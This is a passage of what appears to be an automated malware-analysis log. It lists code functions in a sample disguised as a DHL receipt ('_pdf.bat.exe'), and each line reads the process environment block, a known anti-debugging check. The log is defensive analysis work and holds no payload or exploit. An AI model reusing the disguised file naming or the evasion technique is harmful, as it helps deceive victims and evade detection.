Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C720 mov eax, dword ptr fs:[00000030h]	4_2_0141C720
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0750 mov eax, dword ptr fs:[00000030h]	4_2_013E0750
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145C730 mov eax, dword ptr fs:[00000030h]	4_2_0145C730
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141273C mov eax, dword ptr fs:[00000030h]	4_2_0141273C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141273C mov ecx, dword ptr fs:[00000030h]	4_2_0141273C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141273C mov eax, dword ptr fs:[00000030h]	4_2_0141273C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014607C3 mov eax, dword ptr fs:[00000030h]	4_2_014607C3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E07AF mov eax, dword ptr fs:[00000030h]	4_2_013E07AF
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146E7E1 mov eax, dword ptr fs:[00000030h]	4_2_0146E7E1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014027ED mov eax, dword ptr fs:[00000030h]	4_2_014027ED
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014027ED mov eax, dword ptr fs:[00000030h]	4_2_014027ED
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014027ED mov eax, dword ptr fs:[00000030h]	4_2_014027ED
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E47FB mov eax, dword ptr fs:[00000030h]	4_2_013E47FB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E47FB mov eax, dword ptr fs:[00000030h]	4_2_013E47FB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148678E mov eax, dword ptr fs:[00000030h]	4_2_0148678E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014947A0 mov eax, dword ptr fs:[00000030h]	4_2_014947A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EC7C0 mov eax, dword ptr fs:[00000030h]	4_2_013EC7C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E262C mov eax, dword ptr fs:[00000030h]	4_2_013E262C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FE627 mov eax, dword ptr fs:[00000030h]	4_2_013FE627
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A660 mov eax, dword ptr fs:[00000030h]	4_2_0141A660
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A660 mov eax, dword ptr fs:[00000030h]	4_2_0141A660
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A866E mov eax, dword ptr fs:[00000030h]	4_2_014A866E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A866E mov eax, dword ptr fs:[00000030h]	4_2_014A866E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F260B mov eax, dword ptr fs:[00000030h]	4_2_013F260B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01412674 mov eax, dword ptr fs:[00000030h]	4_2_01412674
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E609 mov eax, dword ptr fs:[00000030h]	4_2_0145E609
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01422619 mov eax, dword ptr fs:[00000030h]	4_2_01422619
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01416620 mov eax, dword ptr fs:[00000030h]	4_2_01416620
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01418620 mov eax, dword ptr fs:[00000030h]	4_2_01418620
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013FC640 mov eax, dword ptr fs:[00000030h]	4_2_013FC640
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A6C7 mov ebx, dword ptr fs:[00000030h]	4_2_0141A6C7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A6C7 mov eax, dword ptr fs:[00000030h]	4_2_0141A6C7
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4690 mov eax, dword ptr fs:[00000030h]	4_2_013E4690
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4690 mov eax, dword ptr fs:[00000030h]	4_2_013E4690
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0145E6F2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0145E6F2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0145E6F2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E6F2 mov eax, dword ptr fs:[00000030h]	4_2_0145E6F2
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014606F1 mov eax, dword ptr fs:[00000030h]	4_2_014606F1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014606F1 mov eax, dword ptr fs:[00000030h]	4_2_014606F1
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C6A6 mov eax, dword ptr fs:[00000030h]	4_2_0141C6A6
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014166B0 mov eax, dword ptr fs:[00000030h]	4_2_014166B0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01460946 mov eax, dword ptr fs:[00000030h]	4_2_01460946
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01406962 mov eax, dword ptr fs:[00000030h]	4_2_01406962
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01406962 mov eax, dword ptr fs:[00000030h]	4_2_01406962
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01406962 mov eax, dword ptr fs:[00000030h]	4_2_01406962
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D8918 mov eax, dword ptr fs:[00000030h]	4_2_013D8918
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013D8918 mov eax, dword ptr fs:[00000030h]	4_2_013D8918
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0142096E mov eax, dword ptr fs:[00000030h]	4_2_0142096E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0142096E mov edx, dword ptr fs:[00000030h]	4_2_0142096E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0142096E mov eax, dword ptr fs:[00000030h]	4_2_0142096E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01484978 mov eax, dword ptr fs:[00000030h]	4_2_01484978
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01484978 mov eax, dword ptr fs:[00000030h]	4_2_01484978
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146C97C mov eax, dword ptr fs:[00000030h]	4_2_0146C97C
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E908 mov eax, dword ptr fs:[00000030h]	4_2_0145E908
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145E908 mov eax, dword ptr fs:[00000030h]	4_2_0145E908
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146C912 mov eax, dword ptr fs:[00000030h]	4_2_0146C912
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146892A mov eax, dword ptr fs:[00000030h]	4_2_0146892A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0147892B mov eax, dword ptr fs:[00000030h]	4_2_0147892B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014769C0 mov eax, dword ptr fs:[00000030h]	4_2_014769C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014149D0 mov eax, dword ptr fs:[00000030h]	4_2_014149D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E09AD mov eax, dword ptr fs:[00000030h]	4_2_013E09AD
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E09AD mov eax, dword ptr fs:[00000030h]	4_2_013E09AD
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AA9D3 mov eax, dword ptr fs:[00000030h]	4_2_014AA9D3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F29A0 mov eax, dword ptr fs:[00000030h]	4_2_013F29A0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146E9E0 mov eax, dword ptr fs:[00000030h]	4_2_0146E9E0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014129F9 mov eax, dword ptr fs:[00000030h]	4_2_014129F9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014129F9 mov eax, dword ptr fs:[00000030h]	4_2_014129F9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_013EA9D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_013EA9D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_013EA9D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_013EA9D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_013EA9D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013EA9D0 mov eax, dword ptr fs:[00000030h]	4_2_013EA9D0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014689B3 mov esi, dword ptr fs:[00000030h]	4_2_014689B3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014689B3 mov eax, dword ptr fs:[00000030h]	4_2_014689B3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014689B3 mov eax, dword ptr fs:[00000030h]	4_2_014689B3
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01410854 mov eax, dword ptr fs:[00000030h]	4_2_01410854
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146E872 mov eax, dword ptr fs:[00000030h]	4_2_0146E872
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146E872 mov eax, dword ptr fs:[00000030h]	4_2_0146E872
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01476870 mov eax, dword ptr fs:[00000030h]	4_2_01476870
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01476870 mov eax, dword ptr fs:[00000030h]	4_2_01476870
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146C810 mov eax, dword ptr fs:[00000030h]	4_2_0146C810
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4859 mov eax, dword ptr fs:[00000030h]	4_2_013E4859
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E4859 mov eax, dword ptr fs:[00000030h]	4_2_013E4859
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141A830 mov eax, dword ptr fs:[00000030h]	4_2_0141A830
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148483A mov eax, dword ptr fs:[00000030h]	4_2_0148483A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148483A mov eax, dword ptr fs:[00000030h]	4_2_0148483A
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402835 mov eax, dword ptr fs:[00000030h]	4_2_01402835
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402835 mov eax, dword ptr fs:[00000030h]	4_2_01402835
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402835 mov eax, dword ptr fs:[00000030h]	4_2_01402835
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402835 mov ecx, dword ptr fs:[00000030h]	4_2_01402835
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402835 mov eax, dword ptr fs:[00000030h]	4_2_01402835
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01402835 mov eax, dword ptr fs:[00000030h]	4_2_01402835
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F2840 mov ecx, dword ptr fs:[00000030h]	4_2_013F2840
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140E8C0 mov eax, dword ptr fs:[00000030h]	4_2_0140E8C0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AA8E4 mov eax, dword ptr fs:[00000030h]	4_2_014AA8E4
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0141C8F9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141C8F9 mov eax, dword ptr fs:[00000030h]	4_2_0141C8F9
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0887 mov eax, dword ptr fs:[00000030h]	4_2_013E0887
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146C89D mov eax, dword ptr fs:[00000030h]	4_2_0146C89D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01494B4B mov eax, dword ptr fs:[00000030h]	4_2_01494B4B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01494B4B mov eax, dword ptr fs:[00000030h]	4_2_01494B4B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01476B40 mov eax, dword ptr fs:[00000030h]	4_2_01476B40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01476B40 mov eax, dword ptr fs:[00000030h]	4_2_01476B40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014AAB40 mov eax, dword ptr fs:[00000030h]	4_2_014AAB40
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01488B42 mov eax, dword ptr fs:[00000030h]	4_2_01488B42
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148EB50 mov eax, dword ptr fs:[00000030h]	4_2_0148EB50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013DCB7E mov eax, dword ptr fs:[00000030h]	4_2_013DCB7E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145EB1D mov eax, dword ptr fs:[00000030h]	4_2_0145EB1D
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140EB20 mov eax, dword ptr fs:[00000030h]	4_2_0140EB20
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140EB20 mov eax, dword ptr fs:[00000030h]	4_2_0140EB20
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A8B28 mov eax, dword ptr fs:[00000030h]	4_2_014A8B28
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_014A8B28 mov eax, dword ptr fs:[00000030h]	4_2_014A8B28
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0BBE mov eax, dword ptr fs:[00000030h]	4_2_013F0BBE
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0BBE mov eax, dword ptr fs:[00000030h]	4_2_013F0BBE
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01400BCB mov eax, dword ptr fs:[00000030h]	4_2_01400BCB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01400BCB mov eax, dword ptr fs:[00000030h]	4_2_01400BCB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01400BCB mov eax, dword ptr fs:[00000030h]	4_2_01400BCB
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148EBD0 mov eax, dword ptr fs:[00000030h]	4_2_0148EBD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146CBF0 mov eax, dword ptr fs:[00000030h]	4_2_0146CBF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140EBFC mov eax, dword ptr fs:[00000030h]	4_2_0140EBFC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8BF0 mov eax, dword ptr fs:[00000030h]	4_2_013E8BF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8BF0 mov eax, dword ptr fs:[00000030h]	4_2_013E8BF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8BF0 mov eax, dword ptr fs:[00000030h]	4_2_013E8BF0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0BCD mov eax, dword ptr fs:[00000030h]	4_2_013E0BCD
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0BCD mov eax, dword ptr fs:[00000030h]	4_2_013E0BCD
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E0BCD mov eax, dword ptr fs:[00000030h]	4_2_013E0BCD
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01494BB0 mov eax, dword ptr fs:[00000030h]	4_2_01494BB0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01494BB0 mov eax, dword ptr fs:[00000030h]	4_2_01494BB0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0148EA60 mov eax, dword ptr fs:[00000030h]	4_2_0148EA60
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141CA6F mov eax, dword ptr fs:[00000030h]	4_2_0141CA6F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141CA6F mov eax, dword ptr fs:[00000030h]	4_2_0141CA6F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141CA6F mov eax, dword ptr fs:[00000030h]	4_2_0141CA6F
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145CA72 mov eax, dword ptr fs:[00000030h]	4_2_0145CA72
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0145CA72 mov eax, dword ptr fs:[00000030h]	4_2_0145CA72
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0146CA11 mov eax, dword ptr fs:[00000030h]	4_2_0146CA11
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0A5B mov eax, dword ptr fs:[00000030h]	4_2_013F0A5B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013F0A5B mov eax, dword ptr fs:[00000030h]	4_2_013F0A5B
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141CA24 mov eax, dword ptr fs:[00000030h]	4_2_0141CA24
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0140EA2E mov eax, dword ptr fs:[00000030h]	4_2_0140EA2E
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E6A50 mov eax, dword ptr fs:[00000030h]	4_2_013E6A50
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01404A35 mov eax, dword ptr fs:[00000030h]	4_2_01404A35
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01404A35 mov eax, dword ptr fs:[00000030h]	4_2_01404A35
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_0141CA38 mov eax, dword ptr fs:[00000030h]	4_2_0141CA38
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01436ACC mov eax, dword ptr fs:[00000030h]	4_2_01436ACC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01436ACC mov eax, dword ptr fs:[00000030h]	4_2_01436ACC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01436ACC mov eax, dword ptr fs:[00000030h]	4_2_01436ACC
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01414AD0 mov eax, dword ptr fs:[00000030h]	4_2_01414AD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_01414AD0 mov eax, dword ptr fs:[00000030h]	4_2_01414AD0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8AA0 mov eax, dword ptr fs:[00000030h]	4_2_013E8AA0
Source: C:\Users\user\Desktop\DHL AWB Receipt_pdf.bat.exe	Code function: 4_2_013E8AA0 mov eax, dword ptr fs:[00000030h]	4_2_013E8AA0
